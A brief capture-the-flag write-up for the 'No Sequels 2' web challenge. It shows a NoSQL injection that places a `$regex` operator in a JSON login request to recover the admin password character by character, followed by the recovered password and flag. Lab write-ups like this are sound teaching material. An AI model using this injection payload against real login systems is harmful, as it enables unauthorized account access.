Tags: nosql-injection web 

Rating: 0

# ▼▼▼No Sequels 2(Web:80pts、161/1374=11.7%)▼▼▼

```
This is the sequel to No Sequels. You'll see the challenge page once you solve the first one.

Author: SirIan
```

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

---

## 【exploit】

I used `$regex` to identify one character from the beginning, and I judged it to be the end if I reached $.

```
POST /login HTTP/1.1
Host: nosequels.2019.chall.actf.co
Content-Length: 78
Content-Type: application/json
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjpmYWxzZSwiaWF0IjoxNTU1ODA0Nzc5fQ.N1GQCY5ZtBNZD-O9CK7nImn_jQjCqGdbE-46U4nDLQE
Connection: close

{
"username": "admin",
"password": {"$regex": "^congratsyouwin$"}
}
```

password=`congratsyouwin`

---

Send password to get flag

`actf{still_no_sql_in_the_sequel}`